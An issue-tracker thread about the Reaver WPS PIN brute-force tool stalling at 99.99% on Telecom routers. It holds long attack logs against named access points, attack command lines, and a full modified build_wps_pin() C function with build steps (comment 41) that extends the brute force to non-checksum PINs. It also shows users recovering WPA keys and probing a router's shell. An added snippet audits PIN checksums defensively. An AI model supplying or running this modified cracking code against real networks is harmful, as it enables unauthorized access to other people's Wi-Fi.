Issue 195: Stuck 99.99%, repeats one key
Status:  New
Owner:  ----


Reported by darknw...@gmail.com, Jan 28, 2012
0. What version of Reaver are you using?  (Only defects against the latest
version will be considered.)

rev 112

1. What operating system are you using (Linux is the only supported OS)?

Ubuntu 10.10

2. Is your wireless card in monitor mode (yes/no)?

Yes

3. What is the signal strength of the Access Point you are trying to crack?

4. What is the manufacturer and model # of the device you are trying to
crack?

43db

5. What is the entire command line string you are supplying to reaver?

sudo reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv -a and sometimes -p argument

6. Please describe what you think the issue is.

I don't know; it gets stuck at 99% and keeps repeating the same PIN.

7. Paste the output from Reaver below.

It's big so I put it here http://pastebin.com/raw.php?i=RDzF0FBz


Jan 29, 2012
#1 darknw...@gmail.com
nobody?
Jan 30, 2012
#3 davidewe...@gmail.com
I've got the same problem too... does a resolution exist????
Jan 30, 2012
#5 davidewe...@gmail.com
Ubuntu 11.10
  wireless: Broadcom
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[?] Restore previous session for D4:D1:84:DD:0A:43? [n/Y] Y
[+] Restored previous session
[+] Waiting for beacon from D4:D1:84:DD:0A:43
[+] Switching mon0 to channel 1
[+] Associated with D4:D1:84:DD:0A:43 (ESSID: Telecom-81594941)
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] 99.99% complete @ 2012-01-30 21:53:33 (10 seconds/pin)
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] 99.99% complete @ 2012-01-30 21:53:53 (8 seconds/pin)
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] 99.99% complete @ 2012-01-30 21:54:14 (8 seconds/pin)
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] 99.99% complete @ 2012-01-30 21:54:35 (8 seconds/pin)
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] 99.99% complete @ 2012-01-30 21:54:54 (8 seconds/pin)
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] 99.99% complete @ 2012-01-30 21:55:16 (8 seconds/pin)
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
Jan 31, 2012
#6 vladys.3...@gmail.com
I have a similar problem too, but I don't know what is happening :(
Feb 3, 2012
#7 davidewe...@gmail.com
nobody??
Feb 4, 2012
#8 cryptom...@gmail.com
#wps transaction failed (code: 0x02), re-trying last pin
#wps transaction failed (code: 0x03), re-trying last pin

I've experienced the same issues using an Alfa rtl8187. I've found the solution to the problem is to play with the "-d" flag.

Start at "-d 15" or higher until you stop receiving the (code: 0x02) (code: 0x03) errors. Then work your way down. Each router I've tested likes a different value. 

I was also using the "--no-nacks" argument.
Feb 8, 2012
#9 saeed.y2...@gmail.com
Hi

I have exactly the same problem.
I also tried -d 15 or -N and this solution http://code.google.com/p/reaver-wps/issues/detail?id=88#c4
but it didn't work!

this is my log file
root@bt:~# reaver -i mon0 -b 00:1E:E3:EA:FE:27 -L -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[?] Restore previous session for 00:1E:E3:EA:FE:27? [n/Y] y
[+] Restored previous session
[+] Waiting for beacon from 00:1E:E3:EA:FE:27
[+] Switching mon0 to channel 1
[+] Associated with 00:1E:E3:EA:FE:27 (ESSID: WLAN_FE27)
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] 91.00% complete @ 2012-02-09 00:18:43 (3 seconds/pin)
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] 91.04% complete @ 2012-02-09 00:18:58 (3 seconds/pin)
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
^C
[+] Session saved.

and you can download my capture file from here

http://www.mediafire.com/?kzc5utohkjlo67l

it seems there is a bug in reaver 1.4 (stable version)

please consider this issue
I am looking forward to hearing from you soon
Feb 16, 2012
#10 music.an...@gmail.com
0. What version of Reaver are you using?  (Only defects against the latest
version will be considered.)

rev 112

1. What operating system are you using (Linux is the only supported OS)?

Backtrack 5

2. Is your wireless card in monitor mode (yes/no)?

Yes

3. What is the signal strength of the Access Point you are trying to crack?

-76 db

4. What is the manufacturer and model # of the device you are trying to
crack?

ADB Broadband Italia/Pirelli

5. What is the entire command line string you are supplying to reaver?

reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv --win7 --no-nacks --dh-small -d 10/15 -c 6 

6. Please describe what you think the issue is.

It seems like the 1st part of the pin, 0123, is correct, and it starts at 90% completed. It runs till 99.99%, last pin 01239980.
At start ... right after the 90% complete ... if I open the mac.wpc, the number on the 1st line is 2; after reading some docs, that means the pin is fully broken.

7. Paste the output from Reaver below.

2
5
1
1234
0000
0123
1111
2222
3333
4444
5555
6666
7777
8888
9999
0001
....

Feb 20, 2012
#11 frederi...@gmail.com
I only have success using Backtrack with -50 signals or higher: -45, -40 and so on.

So try to get closer. In Backtrack "the less the better"
Feb 20, 2012
#12 richardj...@gmail.com
Hey .. it seems all Telecom routers are the same .. it gives me the same error,
the 1st 4 digits are correct : 0123 . but the rest is all wrong ..
i can't understand if it's a time of protection or what..
btw I tried on another telecom router and got the same thing.

i have access to the 1st one but the pin isn't written anywhere .. i looked around in the settings and info .. but couldn't find the correct one.
it seems the router generates the pin once the button has been clicked.
Feb 21, 2012
#13 fiftyeig...@gmail.com
Same thing here with Telecom router. 
Feb 22, 2012
#14 music.an...@gmail.com
I wanted to add as an issue ... WPS protection is enabled but the method to register with the AP is by "Push Button" instead of PIN.
Btw richardj ... i tested on a telecom modem also :) .

Anyway, I think that wash+reaver should make the difference between push button and pin. It will save us from a lot of wasted time :D
Feb 26, 2012
#15 fiftyeig...@gmail.com
It shouldn't matter if it's a push button pin. You still can become a registrar by trying out all the pins. It must be something else.
Mar 18, 2012
#16 music.an...@gmail.com
3rd Telecom modem/router - same old damn issue :) 0123 correct . 2nd part waste of time.
Off-topic: I hate Telecom :)
Mar 18, 2012
#17 alksande...@gmail.com
Hi All
I have the same issue, how to fix it? I use reaver 1.3 and reaver 1.4, but they all don't work.

Mar 23, 2012
#18 klui...@gmail.com
I tested many ADSL modems ..... Planet ADW-XXXX ..... such a problem with rtl 8187b and Ar9002WB-1NG ... BACKTRACK 5 R2.... They are telecom too!!! Please help
Mar 23, 2012
#19 saeed.y2...@gmail.com
Could anybody analyze the problem?
Mar 23, 2012
#20 klui...@gmail.com
Does somebody know how to write to the author of the program directly?
Mar 23, 2012
#21 klui...@gmail.com
This problem is only with telecom modems!!!!! PLEASE HELP!!!!!
Mar 27, 2012
#22 livewin...@gmail.com
telecom of which country? :D
Mar 28, 2012
#23 klui...@gmail.com
Pridnestrovian Moldavian Republic
May 24, 2012
#24 xpresspa...@gmail.com
I had reformatted my system just cause I allocated partitions wrong...after installing BT5R1 
I started getting this error...I did apt-get update to make sure I was up to date.

---Then I got the wicd dsub interface error which I corrected with : 

-reconfigure wicd
update-rc.d wicd defaults

---Still, got the repeating error stuck at 99.9% so I went and did this POST #3 :

http://code.google.com/p/reaver-wps/wiki/Resources

---Still getting the error after all that, I decided I'd start the process over and not resume...lo and behold it got all the wps and wpa keys.

In my troubleshooting process I removed macchanging as I find it to give me errors every so often

My cli started out as :

Reaver -i xxxx -b xx xx xx xx -w -N -S --mac=xx xx xx xx

Then it ended up as 

Reaver -i xxxx -b xx xx xx xx -w -N -S -l 300 

Not sure if this will help anyone, but this is what I did to get past the 99% problem.



Aug 31, 2012
#25 Leonardo...@gmail.com
I was having the same problem also. I had manually put in the first half of the pin, trying to accelerate the process, and it started at 90.01%; then it was trying different pins, but only the second half was changing since I had put the first half in manually. After it reached 99.99% it stopped trying different pins, so I terminated the process and started from scratch, this time without manually putting in the first half of the pin. Then I saw that the first half was wrong even though it started at 90.01%. Mind you, I never saw a "Receive M5 or M6 message " when the first half of the pin was wrong. Probably start over again and see if it works without the -p argument.
Sep 4, 2012
#26 stefano....@gmail.com
Good evening
I can tell you the reason for this issue and how to solve it. I came across the solution in these last 3 days of spare time. It took me some "mumble mumble" and a little bit of coding.

You get to 99.99% and get stuck because reaver has attempted all the pins that it knows.
So what if the right pin is not in the knowledge of reaver?

While the first 7 digits are consecutive numbers, the last digit is a checksum.
So reaver attempts 10^7 pins, not 10^8 (and that's good!)

But what if the target AP PIN is one of the 9000 not computed?

Solution:
With an exhaustive attempt (small modification of the code under /src/) in the range from 01230000 to 01239999 you will find the right pin (the first 4 digits are those recognized by reaver).
These are 10^4 pins, which at 7 sec./pin will take 19 hours and 30 minutes to look through them all.

conclusion:
luckily it took me 5 hours (more or less 2500 attempted pins); that's because of how I implemented the exhaustive algorithm and because the pin was 01234567 (yes seriously, you can expect others to be 12345678).

next issue:
at this point reaver communicates that this is the right pin but doesn't give the WPA PSK.
I used the wpa_supplicant & wpa_cli method (issue 203 comment 6) and it works like a charm!
now the problem is that after retrieving the PSK and connecting with success, the AP has turned off WPS. I don't mean WPS LOCK, I mean the AP no longer shows up under WASH, and if I try to associate through aireplay (I always used it to associate during pin attempts) it gives this error message: Denied (code 12), wrong ESSID or WPA ?

from now I will shut the connection with this AP for 12 hours to see if it turns WPS on again.

hope that all the things I wrote are interesting for someone!

saluti!
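
The checksum point made in comment 26, as an added example (not code from this thread or from Reaver; the function names are made up for illustration, and the check-digit routine is the weighted mod-10 rule used for WPS PINs). It audits a PIN configured on a device for checksum conformance and counts how many of the 10^4 second halves under one first half pass the checksum. The sample PINs are the ones quoted in this thread.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

enum pin_status { PIN_OK = 0, PIN_BAD_FORMAT = 1, PIN_BAD_CHECKSUM = 2 };

/* Check digit for the first seven digits of a WPS PIN:
 * weights 3,1,3,1,... applied from the rightmost digit, then mod 10. */
unsigned int wps_check_digit(unsigned int first7)
{
    unsigned int accum = 0;
    while (first7) {
        accum += 3 * (first7 % 10);
        first7 /= 10;
        accum += first7 % 10;
        first7 /= 10;
    }
    return (10 - accum % 10) % 10;
}

/* Audit an 8-digit PIN given as a string, so leading zeros survive.
 * On success or checksum failure, *expected receives the digit the
 * checksum rule requires in the last position. */
enum pin_status audit_wps_pin(const char *pin, unsigned int *expected)
{
    unsigned int first7 = 0, want;
    size_t i;

    if (pin == NULL || strlen(pin) != 8)
        return PIN_BAD_FORMAT;
    for (i = 0; i < 8; i++)
        if (!isdigit((unsigned char)pin[i]))
            return PIN_BAD_FORMAT;
    for (i = 0; i < 7; i++)
        first7 = first7 * 10 + (unsigned int)(pin[i] - '0');

    want = wps_check_digit(first7);
    if (expected)
        *expected = want;
    return (unsigned int)(pin[7] - '0') == want ? PIN_OK : PIN_BAD_CHECKSUM;
}

/* Count how many of the 10^4 second halves under a 4-digit first half
 * are checksum-conformant. Returns -1 if first4 is not 4 characters. */
int count_checksum_valid(const char *first4)
{
    char pin[9];
    int second, n = 0;

    if (first4 == NULL || strlen(first4) != 4)
        return -1;
    for (second = 0; second <= 9999; second++) {
        snprintf(pin, sizeof pin, "%s%04d", first4, second);
        if (audit_wps_pin(pin, NULL) == PIN_OK)
            n++;
    }
    return n;
}

int main(void)
{
    /* PINs quoted in the thread's logs and comments */
    const char *samples[] = { "01239980", "12349982", "01234567", "12345670" };
    size_t i;

    for (i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        unsigned int want = 0;
        enum pin_status st = audit_wps_pin(samples[i], &want);
        printf("%s: %s (required last digit: %u)\n", samples[i],
               st == PIN_OK ? "checksum OK" : "checksum MISMATCH", want);
    }
    printf("conformant PINs under first half 0123: %d of 10000\n",
           count_checksum_valid("0123"));
    return 0;
}
```

A device whose configured PIN fails this audit sits outside the checksum-conformant set, which is the situation the comment describes for 01234567.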
Sep 7, 2012
#27 stefano....@gmail.com
I got some news

shutting the connection is useless for WPS reactivation.

!!! after 48 hours the AP has rebooted by itself reactivating WPS with same old pin. !!!

yesterday I tried to reactivate it from telnet but there is no command to accomplish the task (some routers have it).

from 'system shell' I found some directories named "wps...." but didn't have time to explore them.

a couple of things about this AP I found in 'system ver':
Version: 4.5.3.AGPWI_1.0.3
Platform: P.DG A4001N

that's all folks!
saluti!
Sep 11, 2012
#28 Twai...@gmail.com
So you got through the 99,99% error by adding some modifications into /src/???
Would you please share your modifications here? I'm dealing with this issue as well: I'm testing Reaver with many different commercial routers I own, but it doesn't seem to work with any of them....and the developer has not been updating it in months....

Thanks in advance

Sep 14, 2012
#29 bemono...@gmail.com
I'm dealing with this issue as well 99.99%.on BT5 R1 BT5 R3> reaver 1.3 or 1.4 .Please help.
Sep 24, 2012
#30 dnd...@gmail.com
Stefano, thank you very much!
As described in issue 203 comment 6, wpa_supplicant works perfectly. My Telecom was 01234567 too. It seems all Telecom routers have this pin by default.
It would be very useful if there was an option in reaver to ignore calculation and bruteforce last checksum digit.
Sep 24, 2012
#31 keyfo...@veryrealemail.com
Has anyone managed to work out what modifications Stefano made ? :(
Sep 29, 2012
#32 leonardo...@hotmail.it
Stefano seems to have found the problem to the block, could you post the changes you made, so that you can imitate? thank you very much
ps sorry for my english    :-)
Oct 9, 2012
#34 mradulov...@gmail.com
Stefano, I have the 99.99% problem too. Where can I find the pins.c modifications to resolve this, and how do I implement them? If I use reaver-1.4 the first 4 digits of the PIN are always 1234 and the 99.99% problem happens. On reaver-1.3 the first 4 digits are variable but no cracked PIN is found.
Oct 10, 2012
#36 mradulov...@gmail.com
... and reaver starts from 90%. I tried the -p option with 0123, 0000, always the same.
The signal strength is -78 to -82, maybe that's the problem?
Oct 13, 2012
#37 Twai...@gmail.com
@ Stefano (comment 33):
I tried the wpa_cli method you suggested with what should be T*****m's default wps pin, but no luck, so I guess I'll need to figure out and push in your modifications,to test my routers against it.
I read both the info links and the pins.c file you mentioned above, but no luck.
I'm no coder at all but, afaik, the only way should be changing the code to make pin tests try combinations starting with a '0' , as well as ordinary ones...am I right?
As I said, I'm no coder, but I'll appreciate any help on the matter at hand...
Oct 15, 2012
#39 ingen...@gmail.com
So how do we edit the source (I'm assuming pins.c) to not do the sumcheck and instead check the entire keyspace? Can you be specific on what needs changed?
Oct 21, 2012
#40 Tys...@gmail.com
First of all, excuse my English.

@ Stefano hit the point.

I had the same problem: after many tries I only got the first part of the PIN, and it gets stuck at 99.99% trying the same pin.

I looked at pins.c and made a quick fix; the idea is:

First: Try ALL the keys ending in 0. If you have the first part of the pin, it takes 1000 tries. (Try -p xxxx0000 and you will see reaver changes it to xxxx0002, so the pin xxxx0000 will never be tested.)

Second: If the pin does not end in 0, try all the pins ending in 1, after that, ending in 2, etc...

So I changed the line

snprintf(pin, pin_len, "%s%d", key, wps_pin_checksum(atoi(key)));

for

snprintf(pin, pin_len, "%s%d", key, 0);

Look at the change: I changed wps_pin_checksum(atoi(key)) to '0', that is, it will generate keys ending in 0.

After trying all the keys ending in 0, with no luck, I tried this

snprintf(pin, pin_len, "%s%d", key, 1); --> All the keys ending in one.

I got lucky: the key ended in 1, and was found at 93.15%

Remember, after editing pins.c, do

gcc -c pins.c
make
make install

I know it's not a well-done fix, but I'm not a C programmer.

Hope it helps someone.
Oct 22, 2012
#41 stefano....@gmail.com
I'm proud of you Tystar! 
You tried harder than anybody else looking for the insight and then you saw the light.
So it's time to show that light to all the masses.

Assumptions:
-the router accepts WPS transaction so it's not giving you continuously "timeout".
-you know the first 4 digits of the pin (for example 0123 or 1234 or whatever)
retrieve this information using the original reaver before applying the modification.
---------------------------------------------------------------------------------------------
download reaver:
svn checkout http://reaver-wps.googlecode.com/svn/trunk/ reaver-wps-read-only

open the file /root/reaver-wps-read-only/src/pin.c with a text editor
(save a copy you will need it to reinstall original reaver)
after #include "pins.h" SUBSTITUTE THE FIRST FUNCTION WITH THIS SAME FUNCTION (modified):

/* EXHAUSTIVE MOD. init */
/*
 * in these lines trivial modifications are applied over the original code.
 * these lines have to be considered for demonstration purpose only.
 * WPA PSK retrieval is not granted.
 * http://code.google.com/p/reaver-wps/issues/detail?id=195
 */

/* set global vars */
int exhaustive_last_digit = 9;
int exhaustive_index = 000;

/* Builds a WPS PIN from the key tables */
char *build_wps_pin()
{
        char *key = NULL, *pin = NULL;
        int pin_len = PIN_SIZE + 1;

        pin = malloc(pin_len);
        key = malloc(pin_len);
        if(pin && key)
        {
                memset(key, 0, pin_len);
                memset(pin, 0, pin_len);
		
                /* Generate a 7-digit pin */
                snprintf(key, pin_len, "%s%s", get_p1(get_p1_index()), get_p2(exhaustive_index));
				
                /* Append last digit */
                snprintf(pin, pin_len, "%s%d", key, exhaustive_last_digit);

                free(key);

		if(exhaustive_last_digit==0)
		{
			if(exhaustive_index==999)
			{
				cprintf(CRITICAL, "[-] Failed to recover WPS pin. \n");
				/* Clean up and get out */
				globule_deinit();
				exit(EXIT_FAILURE);			
			}
			exhaustive_index++;
			exhaustive_last_digit=9;
		}else{
			exhaustive_last_digit--;
		}
        }

        return pin;
}

/* EXHAUSTIVE MOD. end */

-the current reaver has to be uninstalled:

cd /root/reaver-wps-read-only/src
./configure
make distclean

-the modified reaver has to be installed:

cd /root/reaver-wps-read-only/src
./configure
make
make install
---------------------------------------------------------------------------------------------
call reaver with the option -p 0123 where "0123" are the first 4 digits of the pin.
if you don't specify these 4 digits worst-case will take at least 10 years (3sec/pin * 10^8pin). 
using the right 4 digits worst-case will take at least 10 hours (3sec/pin * 10^4).

to reinstall original reaver:
substitute modified pins.c with the original pins.c that you kept safe somewhere.
uninstall and install with same commands as above.

Oct 23, 2012
#42 cyberfa3...@gmail.com
Sorry about my English..
I have the %99.9 problem too with reaver 1.4 [it starts at %90] (first four digits 1234). But when I tried reaver 1.3 [it starts at %0.0] it got stuck at 90.9 with the same pin -> (first four digits 5323), and I am trying to find a solution..
STEFANO, I did your solution alternately. But 'reaver' didn't open after I typed these into the console "
cd /root/reaver-wps-read-only/src
./configure
make distclean  
cd /root/reaver-wps-read-only/src
./configure
make
make install  
"
The second question: Are we sure that the stuck pin at %99 (1234....) has the correct first four digits?
Finally: in the pins.c folder, we erase everything inside and copy your things in, is that right?? Help pls, I am a bit of a noob. :) Thanks a lot!
Oct 25, 2012
#43 cyberfa3...@gmail.com
Stefano, I solved my 2 problems :) and being pinned, reaver 1.3 (modified) is at about %25 now. But I am still not sure whether the stuck pin's first four digits (1234) are correct :((
Oct 28, 2012
#44 cyberfa3...@gmail.com
reaver 1.4 stuck at %99 1234abcd, reaver 1.3 stuck on different pins 5041klmn, what can I do? Is there no solution for me?!
Jan 29, 2013
#46 sergey...@gmail.com
same problem
same pin 12349982
Apr 12, 2013
#48 s.wra...@gmail.com
guys what can I do for stuck %90.90
May 7, 2013
#49 alfdi...@gmail.com
Stefano,
I'm not sure that the mod in post #41 is correct.

I tried it, without the option -p (my PC is faster than 3 sec/pin), and both half pins - the first 4 digits and the second 4 digits - increased by 1.

ex:
00010001
00020002.

So not all pins are tried.

I'm not a programmer, so could you correct the algorithm?
May 10, 2013
#50 rnaa...@gmail.com
try wpspingenerator
May 29, 2013
#51 morenohe...@gmail.com
I have the solution to resolve these problems: rebuild the PIN guide file.

